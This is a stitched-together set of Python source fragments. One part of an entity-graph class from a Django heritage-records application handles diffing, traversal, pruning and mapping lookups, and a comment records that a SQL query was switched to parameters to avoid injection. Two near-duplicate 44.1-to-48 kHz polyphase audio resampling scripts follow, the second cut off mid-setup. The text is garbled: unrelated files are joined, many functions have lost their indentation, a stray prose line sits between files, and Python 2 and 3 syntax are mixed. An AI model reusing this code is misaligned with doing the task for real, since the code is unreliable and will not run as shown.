    if len(selfEntities) == 0 and len(foundEntities) == 1:
        self.merge_at(entitytomerge, self.entitytypeid)
    return self
def diff(self, entitytotest):
    """
    Find all the entities in self that don't exist in entitytotest
    (this represents entities that have effectively been deleted from entitytotest
    when entitytotest is a version of self)

    Returns {'deleted_nodes': [...], 'updated_nodes': [{'from':..., 'to':...}],
    'inserted_nodes': [...]}; a node present in both sets with the same
    entityid but a different hash is reported as updated.
    """
    ret = {'deleted_nodes':[], 'updated_nodes':[], 'inserted_nodes': []}
    self_flattened = set(self.flatten())
    entitytotest_flattened = set(entitytotest.flatten())
    ret['deleted_nodes'] = list(entitytotest_flattened.difference(self_flattened))
    ret['inserted_nodes'] = list(self_flattened.difference(entitytotest_flattened))
    # reclassify insert+delete pairs sharing an entityid as updates
    for inserted_entity in list(self_flattened.difference(entitytotest_flattened)):
        for deleted_entity in list(entitytotest_flattened.difference(self_flattened)):
            if inserted_entity.entityid == deleted_entity.entityid:
                ret['inserted_nodes'].remove(inserted_entity)
                ret['deleted_nodes'].remove(deleted_entity)
                ret['updated_nodes'].append({'from': deleted_entity, 'to': inserted_entity})
    return ret
def copy(self):
return copy.deepcopy(self)
def flatten(self):
    """
    flattens the graph into a list of unordered entities

    Works on a deep copy: every returned entity gets a ``parentid`` attribute
    (None for the root) and its child_entities list emptied, so the caller
    receives detached nodes rather than a linked graph.
    """
    ret = []
    def gather_entities(entity):
        if entity.get_rank() != 0:
            entity.parentid = entity.get_parent().entityid
        else:
            entity.parentid = None
        ret.append(entity)
    copiedself = self.copy()
    copiedself.traverse(gather_entities)
    # detach children only after the traversal is complete
    for item in ret:
        item.child_entities = []
    return ret
def find_entities_by_type_id(self, entitytypeid):
"""
Gets a list of entities within this instance of a given type
"""
ret = []
def appendValue(entity):
if entity.entitytypeid == entitytypeid:
ret.append(entity)
self.traverse(appendValue)
return ret
def traverse(self, func, scope=None):
    """
    Traverses a graph from leaf to root calling the given function on each node
    passes an optional scope to each function
    Return a value from the function to prematurely end the traversal

    func -- callable taking (entity) or (entity, scope); returning a non-None
    value aborts the walk and propagates that value to the caller.
    """
    for child_entity in self.child_entities:
        ret = child_entity.traverse(func, scope)
        if ret != None:
            # break???
            return ret
    if scope == None:
        ret = func(self)
    else:
        ret = func(self, scope)
    #break out of the traversal if the function returns a value
    if ret != None:
        return ret
def get_rank(self, rank=0):
"""
Get the rank of this instance (root is 0)
"""
if hasattr(self, 'get_parent'):
return self.get_parent().get_rank(rank+1)
return rank
def get_root(self):
"""
Get the root node of this instance
"""
if hasattr(self, 'get_parent'):
return self.get_parent().get_root()
return self
def set_entity_value(self, entitytypeid, value, append=False):
    """
    Directly sets the value of a node in the graph
    Will only set the value if the node exists and there is only one instance of that node or if the node doesn't exist it will be created
    If append is set to True, the node will simply be appended next to other nodes of the same type

    Returns the affected Entity node (None when several nodes of the type
    already exist and append is False).
    """
    entities = self.find_entities_by_type_id(entitytypeid)
    if append or len(entities) == 0:
        # build a new branch from the mapping schema and merge it in
        schema = Entity.get_mapping_schema(self.entitytypeid)
        entity = Entity()
        entity.create_from_mapping(self.entitytypeid, schema[entitytypeid]['steps'], entitytypeid, value)
        self.merge_at(entity, schema[entitytypeid]['mergenodeid'])
        return entity
    if len(entities) == 1:
        entities[0].value = value
        return entities[0]
def create_from_mapping(self, entitytypeid, mappingsteps, leafentitytypeid, leafvalue, leafentityid=''):
    """
    Build a chain of entities from ``entitytypeid`` down through
    ``mappingsteps`` (see _get_mappings); the step matching
    ``leafentitytypeid`` receives ``leafvalue``.  Returns self.

    NOTE(review): ``leafentityid`` is passed to every step, not only the
    leaf -- confirm this is intentional.
    """
    currentEntity = self
    currentEntity.entitytypeid = entitytypeid
    for step in mappingsteps:
        currentEntity.entityid = ''
        value = ''
        if step['entitytyperange'] == leafentitytypeid:
            value = leafvalue
        currentEntity = currentEntity.add_child_entity(step['entitytyperange'], step['propertyid'], value, leafentityid)
    return self
@classmethod
def get_mapping_schema(cls, entitytypeid):
    """
    Gets a complete entity schema graph for a single entity type given an entity type id

    Returns {target entitytypeid: {'steps': [rule dicts], 'mergenodeid': id}}.
    """
    ret = {}
    mappings = archesmodels.Mappings.objects.filter(entitytypeidfrom = entitytypeid)
    for mapping in mappings:
        if mapping.entitytypeidto.pk not in ret:
            ret[mapping.entitytypeidto.pk] = {'steps':[], 'mergenodeid': mapping.mergenodeid}
        ret[mapping.entitytypeidto.pk]['steps'] = (Entity._get_mappings(mapping.pk))
    return ret
@classmethod
def _get_mappings(cls, mappingid):
    """
    Gets the ordered rule steps for a single mapping given a mapping id.

    Returns a list of dicts with keys 'entitytypedomain', 'entitytyperange'
    and 'propertyid', in mapping-step order.
    """
    ret = []
    cursor = connection.cursor()
    # Parameterized query: the original interpolated mappingid into the SQL
    # string with %, which is an SQL injection risk; let the DB driver quote it.
    cursor.execute("""
        SELECT
            rules.entitytypedomain,
            rules.entitytyperange,
            rules.propertyid,
            mapping_steps."order",
            mappings.entitytypeidfrom,
            mappings.entitytypeidto,
            mapping_steps.mappingid
        FROM
            ontology.rules,
            ontology.mapping_steps,
            ontology.mappings
        WHERE
            mapping_steps.ruleid = rules.ruleid AND
            mappings.mappingid = %s AND
            mappings.mappingid = mapping_steps.mappingid
        ORDER BY
            mappings.entitytypeidfrom ASC,
            mappings.entitytypeidto ASC,
            mappings.mappingid ASC,
            mapping_steps."order" ASC;
    """, [mappingid])
    for mapping_step in cursor.fetchall():
        ret.append({
            'entitytypedomain': mapping_step[0],
            'entitytyperange': mapping_step[1],
            'propertyid': mapping_step[2],
        })
    return ret
def prune(self, entitytypes, action='disallow'):
"""
entitytypes is a list of entitytypeids allowed or dissallowed in the graph
if action=disallow (the default) then prune will remove all entities and their children from the entity graph that match the list of provided entitytypes
if action=allow then prune will pass through all entities and their parents from the entity graph that match the list of provided entitytypes
.. code-block:: python
# simple example of prunning a graph
entity.prune(['ARCHES RECORD.E31', 'PHASE TYPE ASSIGNMENT.E17', 'SPATIAL COORDINATES_GEOMETRY.E47', 'NAME.E41'])
# a more fully formed example of prunning a graph based on user permissions
fullgraph = set(entity.flatten())
from django.contrib.auth.models import User
user = User.objects.get(pk=1)
print user
if not user.is_superuser:
permissions = user.get_all_permissions()
entitytypes = []
for permission in permissions:
if permission.startswith('%s.read_' % entity.entitytypeid):
print permission.split('%s.read_' % entity.entitytypeid)[1]
entitytypes.append(permission.split('%s.read_' % entity.entitytypeid)[1])
entity.prune(entitytypes, action='allow')
prunedgraph = set(entity.flatten())
print fullgraph.intersection(prunedgraph)
print fullgraph.issuperset(prunedgraph)
print fullgraph.symmetric_difference(prunedgraph)
"""
if action == 'disallow':
self.filter(lambda entity: entity.entitytypeid not in entitytypes)
else:
self.filter(lambda entity: entity.entitytypeid in entitytypes)
return
# parent_entitytypes = set()
# flattened_graph = self.flatten()
# entities_to_prune = set()
# def gather_parent_entitytypes(entity):
# if entity.get_rank() == 0:
# return
# parent_entity = entity.get_parent()
# parent_entitytypes.add(parent_entity.entitytypeid)
# gather_parent_entitytypes(parent_entity)
# if action == 'disallow':
# for entity in flattened_graph:
# if entity.entitytypeid in entitytypes:
# entities_to_prune.add(entity)
# else:
# # if you passed in no entitytypes then you're basically saying remove all information from the graph
# if len(entitytypes) == 0:
# self.clear()
# return
# # first we need to loop through the graph to all the parents of entity to the list of allowed entitytypes
# for entity in flattened_graph:
# if entity.entitytypeid in entitytypes:
# gather_parent_entitytypes(entity)
# entitytypes = entitytypes + list(parent_entitytypes)
# for entity in flattened_graph:
# if entity.entitytypeid not in entitytypes:
# entities_to_prune.add(entity)
# # prune the remaining entities
# print 'entities to prune: %s' % entities_to_prune
# for entity in entities_to_prune:
# try:
# parent = entity.get_parent()
# print '\nremoving: %s' % entity
# parent.child_entities.remove(entity)
# except:
# if entity.get_rank() == 0:
# self.clear()
# return
self.trim()
def trim(self):
"""
recursively removes all nodes starting from the leaf that have no child_entities and no value
these nodes are assumed to be of no material value to the graph
"""
#somelist[:] = [tup for tup in somelist if determine(tup)]
# def func(entity):
# try:
# parent = entity.get_parent()
# print '-'*10
# print entity
# print len(parent.child_entities)
# if len(entity.child_entities) == 0 and entity.value == '':
# print JSONSerializer().serialize(entity, indent=4)
# parent.child_entities.remove(entity)
# print len(parent.child_entities)
# except:
# pass
# def func(entity):
# try:
# # http://stackoverflow.com/questions/1207406/remove-items-from-a-list-while-iterating-in-python
# parent = entity.get_parent()
# parent.child_entities[:] = [child_entity for child_entity in parent.child_entities if (len(child_entity.child_entities) != 0 or child_entity.value != '')]
# except:
# pass
#self.traverse(func)
self.filter((lambda entity: len(entity.child_entities) != 0 or entity.value != ''))
def filter(self, lambda_expression):
"""
Only allows the nodes defined in the lambda_expression to populate the entity graph
(eg: filters out of the entity graph any entity that doesn't return true from the lambda_expression)
"""
def func(entity):
if hasattr(entity, 'get_parent'):
parent = entity.get_parent()
parent.child_entities[:] = filter(lambda_expression, parent.child_entities)
# else:
# entity.child_entities[:] = filter(lambda_expression, entity.child_entities)
self.traverse(func)
def clear(self):
"""
resets this entity back to a clean state (does not delete the entity from the database)
"""
self.child_entities = []
self.entitytypeid = ''
self.entityid = ''
self.value = ''
@staticmethod
def _get_model(tablename):
    """
    Helper to look up a model from a table name.

    tablename -- business table name; resolved as Django model 'models.<tablename>'
    Raises TypeError when no matching model is found.
    """
    try:
        model_identifier = str('models.' + tablename)
        Model = models.get_model(*model_identifier.split("."))
    except TypeError:
        Model = None
    if Model is None:
        # NOTE(review): if the str() concatenation itself raised TypeError,
        # model_identifier is unbound here and this raise becomes a NameError
        raise TypeError(u"Invalid model identifier: '%s'" % model_identifier)
    return Model
def dictify(self, keys=['label']):
"""
Takes an entity and turns it into recursive lists nested objects
Uses an in-built algorithm to derive which sub-branches appear to be grouped, and then flattens them out
A partial example output follows...
.. code-block:: python
[
{
"EVALUATION_CRITERIA_ASSIGNMENT_E13": [{
"STATUS_E55": [
{"STATUS_E55__label": "3D"},
{"STATUS_E55__label": "3CD"},
{"STATUS_E55__label": "5D3"}
]
}],
"BEGINNING_OF_EXISTENCE_E63": [{
"BEGINNING_OF_EXISTENCE_TIME-SPAN_E52": [{
"BEGINNING_OF_EXISTENCE_TIME-SPAN_E52__label": "",
"START_DATE_OF_EXISTENCE_E49__label": "1962-01-01T00:00:00"
}],
"BEGINNING_OF_EXISTENCE_TYPE_E55": [{
"BEGINNING_OF_EXISTENCE_TYPE_E55__label": "Built Date"
}]
}],
"NAME_E41": [{
"NAME_TYPE_E55__label": "Primary",
"NAME_E41__label": "3264 N WRIGHTWOOD DR"
}],
"PRODUCTION_E12": [{
"PHASE_TYPE_ASSIGNMENT_E17": [
{
"STYLE_E55": [{
"STYLE_E55__label": "Modern, Mid-Century"
}],
"HERITAGE_RESOURCE_TYPE_E55": [{
"HERITAGE_RESOURCE_TYPE_E55__label": "HP02. Single family property"
},{
"HERITAGE_RESOURCE_TYPE_E55__label": "House"
}],
"HERITAGE_RESOURCE_USE_TYPE_E55": [{
"HERITAGE_RESOURCE_USE_TYPE_E55__label": "Historic"
}]
}
]
}]
}
]
"""
data = {}
for child_entity in self.child_entities:
if child_entity.businesstablename != '':
data[child_entity.undotify()] = self.get_nodes(child_entity.entitytypeid, keys=keys)
else:
if child_entity.undotify() not in data:
data[child_entity.undotify()] = []
data[child_entity.undotify()].append(child_entity.dictify(keys=keys))
return data
def get_nodes(self, entitytypeid, keys=[]):
"""
Used by dictify to gather and flatten a single node (by entitytypeid) and all it's children
for example, a NAME.E41 node with a single child of NAME_TYPE.E55 would be transformed as below
.. code-block:: python
"NAME_E41": [{
"NAME_TYPE_E55__label": "Primary",
"NAME_E41__label": "3264 N WRIGHTWOOD DR"
}],
"""
ret = []
entities = self.find_entities_by_type_id(entitytypeid)
for entity in entities:
data = {}
for entity in entity.flatten():
data = dict(data.items() + entity.encode(keys=keys).items())
ret.append(data)
return ret
def encode(self, keys=[]):
"""
Encodes an Entity into a dictionary of keys derived by the entitytypeid of the Entity concatonated wtih property name
.. code-block:: python
{
"NAME_TYPE_E55__label": "Primary"
}
"""
ret = {}
for key, value in self.__dict__.items():
if key in keys:
ret['%s__%s' % (self.undotify(), key)] = value
return ret
def undotify(self):
    """Return this entity's type id in a form usable as a dict/JSON key."""
    return self.undotify_entitytypeid()
def undotify_entitytypeid(self):
return self.entitytypeid.replace('.', '_').replace('-', '___');
def to_json(self):
    """Serialize the full entity graph to a JSON string."""
    return JSONSerializer().serialize(self)
import fractions
import math
import numpy
import scipy
import scipy.signal as signal
import scipy.io.wavfile as wavfile
import matplotlib.pyplot as plot
import sys
import wave
# Resampling configuration: convert 44.1 kHz audio to 48 kHz.
from_rate = 44100.0
to_rate = 48000.0
# Intermediate (upsampled) rate = LCM of the two rates.
rategcd = fractions.gcd(from_rate, to_rate)
samp_rate = from_rate * to_rate / rategcd
print("upsample rate: %f kHz\n" % (samp_rate/1000))
# Integer up/down factors realizing the rational rate conversion.
ups_ratio = int(samp_rate / from_rate)
dec_ratio = int(samp_rate / to_rate)
print("ups: %d, dec: %d\n" % (ups_ratio, dec_ratio))
nyq_rate = samp_rate / 2.0
# Passband edge: keep everything up to the audible limit.
audible_freq = 22000.0
def ratio_to_db(ratio):
    """Convert a power ratio to decibels (10*log10)."""
    return math.log10(ratio) * 10
def db_to_ratio(db):
    """
    Convert decibels to a power ratio (inverse of ratio_to_db).

    Divides by 10.0 so integer dB inputs are not floor-divided on Python 2
    (the original ``db / 10`` turned -6 dB into 10**-1 instead of 10**-0.6).
    """
    return math.pow(10, db / 10.0)
def gen_sin(db, freq, sampling_rate, t):
    """
    Generate ``t`` seconds of a sine tone.

    db -- amplitude in dB, converted through db_to_ratio
    freq -- tone frequency in Hz
    sampling_rate -- samples per second
    Returns a numpy array of length int(t * sampling_rate).
    Fix: range() instead of the Python-2-only xrange(); identical iteration.
    """
    amplitude = db_to_ratio(db)
    n = int(t * sampling_rate)
    ret = numpy.zeros(n)
    for i in range(n):
        theta = float(i) * freq * 2 * math.pi / sampling_rate
        ret[i] = math.sin(theta) * amplitude
    return ret
def apply_filter(src, taps, ups, dec):
    """
    Polyphase rational-rate resampler: conceptually upsample ``src`` by
    ``ups``, FIR-filter with ``taps`` (len(taps) must be a multiple of ups),
    and decimate by ``dec``.  Returns the output samples as a list.

    Fixes: ``len(taps) / ups`` yields a float on Python 3 (breaking xrange/
    indexing) -- use ``//``; ``range`` replaces the Python-2-only ``xrange``.
    """
    ups = int(ups)
    dec = int(dec)
    depth = len(taps) // ups  # taps per polyphase branch
    dst = []
    firidx = 0  # current polyphase branch
    si = 0      # input sample index
    while True:
        d = 0.0
        for j in range(depth):
            s = src[si + j]
            c = taps[ups - 1 - firidx + j * ups]
            d += s * c
        # compensate for the gain lost to zero-stuffing
        d *= ups
        dst.append(d)
        firidx += dec
        if firidx >= ups:
            firidx -= ups
            si += 1
        if si > len(src) - depth:
            break
    return dst
def half_filter(taps):
    """
    Return the second half of a symmetric FIR tap set.
    Fix: ``n / 2`` is a float on Python 3 and not a valid slice index -- use ``//``.
    """
    n = len(taps)
    return taps[n // 2:n]
def reorder_half_filter(htaps, ups, dec):
    """
    Reorder half-filter taps into contiguous per-branch blocks so that
    apply_filter_half_reordered can slice each polyphase branch directly.

    dec -- unused; kept (and validated) for signature parity with apply_filter.
    Fixes: ``//`` for the per-branch tap count (Python 3 safe); ``range``
    replaces ``xrange``; unused local ``depth`` removed.
    """
    ups = int(ups)
    dec = int(dec)
    hn = len(htaps)
    hd = hn // ups  # taps per polyphase branch
    r = numpy.zeros(hn)
    ri = 0
    for i in range(ups):
        for j in range(hd):
            r[ri] = htaps[ups - 1 - i + j * ups]
            ri += 1
    return r
def muladd(mcand, mplier, cross):
    """
    Dot product of two equal-length sequences with a float accumulator.

    cross -- True reverses ``mplier`` (convolution-style); False is a plain
    dot product.  Raises ValueError on length mismatch.
    Fix: ``range`` replaces the Python-2-only ``xrange``.
    """
    if len(mcand) != len(mplier):
        raise ValueError('mcand and mplier len do not match!')
    n = len(mcand)
    ret = 0.0
    if cross:
        for i in range(n):
            ret += mcand[i] * mplier[n - 1 - i]
    else:
        for i in range(n):
            ret += mcand[i] * mplier[i]
    return ret
def apply_filter_half_reordered(src, rhtaps, ups, dec):
    """
    Same resampler as apply_filter, but exploits FIR symmetry: ``rhtaps``
    holds the reordered second half of the taps (see reorder_half_filter),
    halving coefficient storage.

    Fix: ``len(rhtaps) / ups`` is a float on Python 3 -- use ``//``.
    """
    ups = int(ups)
    dec = int(dec)
    hn = len(rhtaps)
    hd = hn // ups  # taps per branch
    depth = hd * 2
    dst = []
    firidx = 0
    si = 0
    while True:
        d = 0.0
        # L: mirrored (first) half of the symmetric filter
        o = hn - (firidx + 1) * hd
        d += muladd(src[si:si + hd], rhtaps[o:o + hd], True)
        # R: stored second half
        o = firidx * hd
        d += muladd(src[si + hd:si + hd * 2], rhtaps[o:o + hd], False)
        d *= ups
        dst.append(d)
        firidx += dec
        if firidx >= ups:
            firidx -= ups
            si += 1
        if si > len(src) - depth:
            break
    return dst
def plot_filterfreqresp(taps, nyq_rate):
    """
    Plot the magnitude response (dB) of FIR ``taps`` on the current axes.
    nyq_rate -- Nyquist rate in Hz, used to scale the frequency axis.
    """
    w, h = signal.freqz(taps, worN=8000)
    h_dB = 20 * numpy.log10(abs(h))
    plot.plot((w/math.pi)*nyq_rate, h_dB)
    plot.xlabel("freq")
    plot.ylabel("gain dB")
    plot.xlim(0, 40000)
    plot.ylim(-100, 5)
    plot.grid(True)
def plot_waveform(d, sampling_freq):
    """Plot samples ``d`` against time in seconds, one marker per sample."""
    t_xaxis = numpy.arange(len(d)) / sampling_freq
    plot.plot(t_xaxis, d, marker='o')
def plot_periodogram(d, sampling_freq, col='b'):
    """
    Plot the power spectrum of ``d`` in dB, limited to 0..22 kHz / -180..0 dB.
    col -- matplotlib color code for the trace.
    """
    f, p = signal.periodogram(d, sampling_freq, scaling='spectrum')
    db = numpy.log10(p) * 10
    plot.ylim([-180, 0])
    plot.xlim([0, 22000])
    # plot.xscale('log')
    plot.plot(f, db, col)
def findzc(d):
    """
    Trim ``d`` to the span between its first and last upward zero crossing
    (a sample where d[i-1] < 0 and d[i] > 0); used to cut whole periods
    before periodogram analysis.  Returns [] when no crossing exists.
    Fix: ``range`` replaces the Python-2-only ``xrange``.
    """
    s = 0
    for i in range(1, len(d)):
        if d[i - 1] < 0 and d[i] > 0:
            s = i
            break
    e = 0
    # scan from the tail for the last upward crossing
    for j in range(1, len(d)):
        i = len(d) - j
        if d[i - 1] < 0 and d[i] > 0:
            e = i
            break
    return d[s:e]
def test_sin1khz(f):
    """
    Push a 1 kHz, -0.1 dB test tone through resampler ``f`` and plot the
    module-level ``taps``, their frequency response, the resampled waveform
    and input/output periodograms (reads globals taps/nyq_rate/from_rate/to_rate).
    """
    sin1khz = gen_sin(-0.1, 1000, from_rate, 1)
    res = f(sin1khz)
    print("done res")
    plot.subplot(411)
    plot.plot(taps)
    plot.subplot(412)
    plot_filterfreqresp(taps, nyq_rate)
    plot.subplot(413)
    # plot_waveform(sin1khz, from_rate)
    plot_waveform(res[0:300], to_rate)
    plot.subplot(414)
    # trim both signals to whole periods to avoid spectral leakage
    plot_periodogram(findzc(sin1khz[1000:len(sin1khz)-1000]), from_rate, 'r')
    plot_periodogram(findzc(res), to_rate)
    plot.show()
def test_sweep(f):
    """
    Run an 8-second quadratic chirp (0 Hz up to from_rate) through resampler
    ``f`` and show before/after spectrograms to reveal aliasing products.
    """
    amp = db_to_ratio(-6)
    te = 8
    t = numpy.linspace(0, 8, from_rate*8)
    x = signal.chirp(t, f0=0, f1=from_rate, t1=te, method='quadratic') * amp
    print("done chirp")
    y = f(x)
    print("done filtering")
    nfft = 64
    win = scipy.hamming(nfft)
    plot.subplot(211)
    plot.specgram(x, NFFT=nfft, Fs=from_rate, noverlap=nfft/2, window=win)
    plot.subplot(212)
    plot.specgram(y, NFFT=nfft, Fs=to_rate, noverlap=nfft/2, window=win)
    plot.show()
# width = 5.0/nyq_rate
# Transition width and stopband attenuation for the Kaiser design estimate.
width = 100.0/nyq_rate
ripple_db = 30.0
N, beta = signal.kaiserord(ripple_db, width)
print("suggested N: %d, beta: %d" % (N,beta))
# Override the estimate with a fixed polyphase depth of 24 taps per branch.
depth = 24
beta = 4
N = depth * ups_ratio
print("N: %d, beta: %d" % (N,beta))
print("polyphase depth: %d\n" % (N/ups_ratio))
# reqmem = N * 16 / 1024.0 / 2;
# print("reqmem: %fKb\n" % reqmem)
# w = ('kaiser', beta)
w = 'blackmanharris'
# Anti-aliasing FIR for the upsampled stream.
taps = signal.firwin(N, cutoff = audible_freq, window = w, nyq = nyq_rate)
def f(x):
    # full-length polyphase resampler
    return apply_filter(x, taps, ups_ratio, dec_ratio)
htaps = half_filter(taps)
rhtaps = reorder_half_filter(htaps, ups_ratio, dec_ratio)
def f3(x):
    # symmetric half-tap variant of f
    return apply_filter_half_reordered(x, rhtaps, ups_ratio, dec_ratio)
sin1khz = gen_sin(-0.1, 1000, from_rate, 1)
test_sin1khz(f3)
# test_sweep(f)
Int filtering: it seems 24/24 is needed.
import fractions
import math
import numpy
import scipy
import scipy.signal as signal
import scipy.io.wavfile as wavfile
import matplotlib.pyplot as plot
import sys
import wave
# Resampling configuration: convert 44.1 kHz audio to 48 kHz.
from_rate = 44100.0
to_rate = 48000.0
# Intermediate (upsampled) rate = LCM of the two rates.
rategcd = fractions.gcd(from_rate, to_rate)
samp_rate = from_rate * to_rate / rategcd
print("upsample rate: %f kHz\n" % (samp_rate/1000))
# Integer up/down factors realizing the rational rate conversion.
ups_ratio = int(samp_rate / from_rate)
dec_ratio = int(samp_rate / to_rate)
print("ups: %d, dec: %d\n" % (ups_ratio, dec_ratio))
nyq_rate = samp_rate / 2.0
# Passband edge: keep everything up to the audible limit.
audible_freq = 22000.0
def ratio_to_db(ratio):
    """Convert a power ratio to decibels (10*log10)."""
    return math.log10(ratio) * 10
def db_to_ratio(db):
    """
    Convert decibels to a power ratio (inverse of ratio_to_db).

    Divides by 10.0 so integer dB inputs are not floor-divided on Python 2
    (the original ``db / 10`` turned -6 dB into 10**-1 instead of 10**-0.6).
    """
    return math.pow(10, db / 10.0)
def gen_sin(db, freq, sampling_rate, t):
    """
    Generate `t` seconds of a sine at `freq` Hz sampled at `sampling_rate`,
    with amplitude given in dB via db_to_ratio.
    Returns a numpy array of length int(t * sampling_rate).
    """
    amplitude = db_to_ratio(db)
    n = int(t * sampling_rate)
    ret = numpy.zeros(n)
    # xrange -> range: xrange is Python-2-only
    for i in range(n):
        theta = float(i) * freq * 2 * math.pi / sampling_rate
        ret[i] = math.sin(theta) * amplitude
    return ret
def apply_filter(src, taps, ups, dec):
    """
    Polyphase rational resampler: conceptually upsample `src` by `ups`,
    FIR-filter with `taps`, and decimate by `dec` -- implemented by
    stepping a phase index instead of materializing the upsampled signal.
    Returns a list of output samples.
    """
    ups = int(ups)
    dec = int(dec)
    # Python 3: / on ints yields float; the polyphase depth must be an int
    depth = len(taps) // ups
    dst = []
    firidx = 0
    si = 0
    while True:
        d = 0.0
        for j in range(depth):
            s = src[si + j]
            # taps of the current polyphase branch, reversed
            c = taps[ups-1-firidx + j*ups]
            d += s * c
        d *= ups  # compensate the upsampling gain loss
        dst.append(d)
        firidx += dec
        if firidx >= ups:
            firidx -= ups
            si += 1
        if si > len(src) - depth:
            break
    return dst
def half_filter(taps):
    """
    Return the second half of a symmetric (linear-phase) FIR filter;
    the first half is its mirror image, so only half need be stored.
    """
    n = len(taps)
    return taps[n//2:n]  # // keeps the index an int on Python 3
def reorder_half_filter(htaps, ups, dec):
    """
    Regroup half-filter taps into `ups` contiguous polyphase sub-filters
    (phase-major order) so each output sample reads one contiguous run.
    Returns a numpy array the same length as `htaps`.
    """
    ups = int(ups)
    dec = int(dec)
    hn = len(htaps)
    hd = hn // ups  # taps per polyphase branch (int division for Python 3)
    r = numpy.zeros(len(htaps))
    ri = 0
    for i in range(ups):
        for j in range(hd):
            r[ri] = htaps[ups-1-i + j*ups]
            ri += 1
    return r
def muladd(mcand, mplier, cross):
    """
    Dot product of two equal-length sequences; with cross=True, `mplier`
    is traversed in reverse (convolution-style) order.
    Raises ValueError when the lengths differ.
    """
    if len(mcand) != len(mplier):
        raise ValueError('mcand and mplier len do not match!')
    n = len(mcand)
    ret = 0.0
    # xrange -> range for Python 3
    if cross:
        for i in range(n):
            ret += mcand[i] * mplier[n-1-i]
    else:
        for i in range(n):
            ret += mcand[i] * mplier[i]
    return ret
def apply_filter_half_reordered(src, rhtaps, ups, dec):
    """
    Same resampler as apply_filter, but exploiting FIR symmetry: the
    filter is applied as one reversed and one forward muladd over
    contiguous runs of the reordered half-filter `rhtaps`.
    """
    ups = int(ups)
    dec = int(dec)
    hn = len(rhtaps)
    hd = hn // ups  # branch length (int division for Python 3)
    depth = hd * 2
    dst = []
    firidx = 0
    si = 0
    while True:
        d = 0.0
        # L: mirrored first half
        o = hn-(firidx+1)*hd
        d += muladd(src[si:si+hd], rhtaps[o:o+hd], True)
        # R: stored second half
        o = firidx*hd
        d += muladd(src[si+hd:si+hd*2], rhtaps[o:o+hd], False)
        d *= ups  # compensate the upsampling gain loss
        dst.append(d)
        firidx += dec
        if firidx >= ups:
            firidx -= ups
            si += 1
        if si > len(src) - depth:
            break
    return dst
def float_to_fixed(l, bits):
    """Quantize floats in [-1, 1] to signed fixed-point ints of `bits` bits."""
    scale = (1 << (bits-1)) - 1
    out = []
    for value in l:
        out.append(int(value * scale))
    return out
def muladde(mcand, mplier, cross):
    """
    Integer-accumulator version of muladd, for emulating fixed-point
    hardware (no float rounding in the accumulation).
    Raises ValueError when the lengths differ.
    """
    if len(mcand) != len(mplier):
        raise ValueError('mcand and mplier len do not match!')
    n = len(mcand)
    ret = 0
    # xrange -> range for Python 3
    if cross:
        for i in range(n):
            ret += mcand[i] * mplier[n-1-i]
    else:
        for i in range(n):
            ret += mcand[i] * mplier[i]
    return ret
def apply_filter_half_reordered_emu(srci, rhetaps, ups, dec):
    """
    Fixed-point emulation of apply_filter_half_reordered: integer input
    samples `srci` against integer taps `rhetaps`.  Note there is no
    `* ups` gain step here -- that scaling is folded into the quantized
    taps by the caller.
    """
    ups = int(ups)
    dec = int(dec)
    hn = len(rhetaps)
    hd = hn // ups  # branch length (int division for Python 3)
    depth = hd * 2
    dst = []
    firidx = 0
    si = 0
    while True:
        d = 0
        # L: mirrored first half
        o = hn-(firidx+1)*hd
        d += muladde(srci[si:si+hd], rhetaps[o:o+hd], True)
        # R: stored second half
        o = firidx*hd
        d += muladde(srci[si+hd:si+hd*2], rhetaps[o:o+hd], False)
        dst.append(d)
        firidx += dec
        if firidx >= ups:
            firidx -= ups
            si += 1
        if si > len(srci) - depth:
            break
    return dst
def plot_filterfreqresp(taps, nyq_rate):
    """Plot the filter's magnitude response in dB over 0-40 kHz."""
    freqs, response = signal.freqz(taps, worN=8000)
    gain_db = 20 * numpy.log10(abs(response))
    plot.plot((freqs/math.pi)*nyq_rate, gain_db)
    plot.xlabel("freq")
    plot.ylabel("gain dB")
    plot.xlim(0, 40000)
    plot.ylim(-100, 5)
    plot.grid(True)
def plot_waveform(d, sampling_freq):
    """Plot samples of `d` against time in seconds, one marker per sample."""
    time_axis = numpy.arange(len(d)) / sampling_freq
    plot.plot(time_axis, d, marker='o')
def plot_periodogram(d, sampling_freq, col='b'):
    """Plot the power spectrum of `d` in dB, clipped to the audible band."""
    freqs, power = signal.periodogram(d, sampling_freq, scaling='spectrum')
    power_db = 10 * numpy.log10(power)
    plot.ylim([-180, 0])
    plot.xlim([0, 22000])
    # plot.xscale('log')
    plot.plot(freqs, power_db, col)
def findzc(d):
    """
    Trim `d` to whole periods: slice from the first positive-going zero
    crossing to the last one (keeps periodogram estimates clean).
    xrange -> range for Python 3.
    """
    s = 0
    for i in range(1, len(d)):
        if d[i-1] < 0 and d[i] > 0:
            s = i
            break
    e = 0
    for j in range(1, len(d)):
        i = len(d)-j
        if d[i-1] < 0 and d[i] > 0:
            e = i
            break
    return d[s:e]
def test_sin1khz(f):
    """Resample a -0.1 dB 1 kHz test tone with `f` and plot the results."""
    tone = gen_sin(-0.1, 1000, from_rate, 1)
    resampled = f(tone)
    print("done res")
    # Panels: taps, frequency response, output waveform, in/out spectra
    plot.subplot(411)
    plot.plot(taps)
    plot.subplot(412)
    plot_filterfreqresp(taps, nyq_rate)
    plot.subplot(413)
    # plot_waveform(tone, from_rate)
    plot_waveform(resampled[0:300], to_rate)
    plot.subplot(414)
    trimmed_in = findzc(tone[1000:len(tone)-1000])
    plot_periodogram(trimmed_in, from_rate, 'r')
    plot_periodogram(findzc(resampled), to_rate)
    plot.show()
def test_sweep(f):
    """
    Resample a full-band quadratic chirp with `f` and compare input/output
    spectrograms; aliasing shows up as energy folded back below Nyquist.
    """
    amp = db_to_ratio(-6)
    te = 8  # sweep duration, seconds
    # linspace's sample count must be an int (float counts raise TypeError
    # in modern numpy)
    t = numpy.linspace(0, te, int(from_rate*te))
    x = signal.chirp(t, f0=0, f1=from_rate, t1=te, method='quadratic') * amp
    print("done chirp")
    y = f(x)
    print("done filtering")
    nfft = 64
    # scipy.hamming was a numpy alias removed from scipy's top level
    win = numpy.hamming(nfft)
    plot.subplot(211)
    plot.specgram(x, NFFT=nfft, Fs=from_rate, noverlap=nfft//2, window=win)
    plot.subplot(212)
    plot.specgram(y, NFFT=nfft, Fs=to_rate, noverlap=nfft//2, window=win)
    plot.show()
# --- Script body: design the anti-aliasing FIR ---
# Kaiser-window order estimate, printed for reference only
# width = 5.0/nyq_rate
width = 100.0/nyq_rate
ripple_db = 30.0
N, beta = signal.kaiserord(ripple_db, width)
